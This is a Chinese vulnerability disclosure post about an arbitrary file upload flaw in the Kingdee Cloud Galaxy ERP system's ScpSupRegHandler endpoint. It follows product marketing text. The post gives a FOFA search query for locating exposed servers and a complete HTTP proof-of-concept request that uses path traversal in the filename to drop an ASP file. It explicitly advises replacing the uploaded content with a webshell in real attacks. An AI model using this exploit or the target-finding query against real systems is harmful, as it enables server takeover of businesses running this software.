金蝶云·星空,高成长型企业SaaS市场领导者,市场份额及客户满意度遥遥领先,连续17年稳居IDC中国成长型企业应用软件市场占有率第一,并入选2021年度国家中小企业公共服务示范平台。金蝶云·星空基于领先的可组装低代码PaaS平台,全面服务客户研发、生产、营销、供应链、财务等领域转型,已支持IPD、精益、阿米巴等先进管理理念在3.4万余家客户实践,一起助力企业“产品力、获客力、交付力、口碑力、收益力”全面提升,重构企业数字战斗力。
金蝶云·星空针对机械装备行业业务特性和发展趋势,提供PLM+ERP+MES一体化解决方案,帮助机械行业完善从研发、设计、采购、制造、营销、服务、维护、保养的产品生命周期管理,构筑更好的“五力”,助力企业逐步实现由生产型制造向服务型制造转变。
该系统存在ScpSupRegHandler 文件存在任意文件上传,攻击者可通过此漏洞上传webshell木马,从而控制服务器。
fofa查询
icon_hash="-1629133697" && title=="金蝶云星空"
POC
POST /k3cloud/SRM/ScpSupRegHandler HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=fd18dd968b553715cbc5a1982526199b
Content-Length: 429
--fd18dd968b553715cbc5a1982526199b
Content-Disposition: form-data; name="FAtt"; filename="../../../../uploadfiles/check.asp."
Content-Type: text/plain
<% Response.Write("This website has a vulnerability!!!") %>
--fd18dd968b553715cbc5a1982526199b
Content-Disposition: form-data; name="FID"
2023
--fd18dd968b553715cbc5a1982526199b
Content-Disposition: form-data; name="dbId_v"
.
--fd18dd968b553715cbc5a1982526199b--
上传成功后,访问:http://ip:port/K3Cloud/uploadfiles/check.asp
实战中将上传内容替换成webshell木马即可
pocsuite漏洞检测
漏洞检测脚本已上传免费漏洞库地址:
https://github.com/Vme18000yuan/FreePOC
希望大家能点个stars支持一下